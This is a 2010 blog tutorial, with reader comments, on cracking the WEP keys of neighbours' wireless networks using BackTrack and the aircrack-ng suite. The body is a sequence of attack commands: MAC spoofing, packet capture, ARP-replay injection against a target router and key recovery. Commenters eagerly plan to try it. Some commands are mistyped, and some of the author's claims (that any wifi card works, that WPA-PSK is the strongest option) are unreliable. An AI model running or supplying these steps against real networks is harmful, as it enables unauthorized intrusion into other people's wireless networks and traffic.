It's all bout technology

February 10, 2010

[Tutorial] Hacking Wifi

Filed under: Hacking — Tags: , , , , , , , , , , , , , , , , — xiaomahe @ 6:09 pm

So, everyone knows about wireless connection / wifi around their neighbourhood. Some of them are not secured at all, in which make this tutorial useless. Read more if you want to understand how it worksOK, when u tried to connect to Wifi around your neighbourhood, some of them are security protected.

Types of wireless security found in router nowadays:

1. WEP [ Wired Equivalent Privacy ] – This is the weakest security that protect a wireless connection from being hacked by professional or amateur hacker.

2. WPA+PSK [ Wifi Protected Access + PreShared Key ] – This is currently the strongest security that can be applied to your wireless connection. Some said that these can be hacked, but require much time to accomplish.

So, basically this tutorial is going to teach you on how to hack Wifi connection with WEP protected. How to identify the security? easy, just hover to the wireless connection, and it will show you what kind of security it has.

In order to follow this tutorial, you must have at least backtrack 3 installed in your machine. You can get the latest backtrack version here [Latest version is Backtrack 4 Final Release]

Ok, this tutorial used backtrack 3 to accomplish the hacking session.

———————————————————————————————————————-

1. Open up a shell command, by clicking the little blackbox next to the start button

2. First thing to do is stop our wireless card, type this in the shell command

* airmon-ng stop wlan0 —> do check what is your wireless device by typing iwconfig in the shell command, in my case, my wireless device in wlan0.

* Now put the wireless card down to make a fake mac address

Type : ifconfig wlan0 down

* Now change the mac address

Type : macchanger -mac 00:11:22:33:44:55 wlan0

* Start the wireless card

Type : airmon-ng start wlan0

3. Now let’s start looking for AP [Access Point]

Type : airodump-ng wlan0

4. After you see the AP’s lists on the left side.  Copy the BSSID or write down on a paper. Example : 00:1c:23:41:34

5. Open another shell

Type : airodump-ng -c 6 -w WIFIHACK -bssid 00:1c:23:41:34 wlan0

“take a look at data. If the number is keep going at the first time you use the airdump-ng, means you do not need to inject it with ARP. But if the number is very slowly increasing, you need to inject it with ARP”

6. Open another shell again, this time we are going to create more data with ARP Injection, so we don’t have to wait for the data to come to us, but we make it to come to us.

Type in the new shell : aireplay-ng -l 0 -a 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0

7. Inject the router in a new shell again

Type : aireplay-ng -3 -b 00:1c:23:41:34 -h 00:11:22:33:44:55 wlan0

8. Processes number 6 and 7 takes a while to actually inject. Check the data in process number 5, if the “data” is increasing rapidly means the injection is success.

9. Wait for the data to be around 100k and above, and you can start cracking the key

Type in new shell : aircrack-ng -n 64 -bssid 00:1c:23:41:34 WIFIHACK-01.cap

Once you crack it down, write the password down on a paper.

It will looks like this when it is cracked with aircrack : 11:CD:21:92:34

but when you type in the password, type: 11CD219234

About these ads

10 Comments »

  1. I’m downloading BT4 right now. .
    and not finish yet…

    when it finish,
    go to the field !
    hehehehe

    Comment by andre — March 8, 2010 @ 3:15 am

  2. can any wi-fi card be used for the hacking purpose?

    Comment by Ayan Mandal — March 15, 2010 @ 1:22 am

    • yes, there shud be no problem.

      Comment by xiaomahe — March 15, 2010 @ 2:19 am

      • thank you

        Comment by Ayan — March 25, 2010 @ 2:16 am

      • Lol dude, no, not every wi-fi card can be used for this. Your WIFI card must have ‘monitor mode’ or something along those lines.

        Don’t spread lies and false hope man

        Comment by Smarter — March 30, 2010 @ 5:11 am

      • Hi Smarter,

        I know that.. ^^
        but you can use another wifi-card, like ipwraw that is available in backtrack 3..

        Just remove ur wifi card if it cant be used in monitor mode.. then use the ipwraw. Then you will be able to start ur learning process.

        This is not false hope.. You just need to do more research..

        How to see ur wifi card: sudo airmon-ng
        In my case it is iwl3945. THis cant be used, so must remove this and used ipwraw

        Follow this command to remove ur wifi card

        1. sudo modprobe -r iwl3945 (THe iwl3945 is depend on what is ur wifi card type)
        2. sudo modprobe ipwraw

        That’s the command, you can check which device is now available by using iwconfig

        normally it will be wifi0.

        Comment by xiaomahe — March 30, 2010 @ 5:52 am

  3. Love this simple tutorial. Many thanks to the people who take their valuable time to write such articles for the public. I hope to see some more in the future ;-).
    Further thanks for the banana smoothie receipt. Tastes very nice!

    Comment by Moe — March 16, 2010 @ 6:15 pm

  4. ok im a noob and when i say noob im in the lowest form of it, do i have to buy a wifi card even if my laptop has wifi

    also i only understand half of the steps, do you think if i dl the software the steps will be easier to understand

    Comment by emilio — March 17, 2010 @ 6:52 pm

    • yeah, it is much easier when you follow this tutorial using the backtrack 3 directly.

      Comment by xiaomahe — March 30, 2010 @ 5:54 am

  5. when i run bt4 vmWare image then get to the shell cmd…i type airmon-ng…nothing happens…how am i supposed to get the wlan?…..im stumped at this part

    Comment by daddy — March 17, 2010 @ 8:44 pm


RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Banana Smoothie Theme. Create a free website or blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: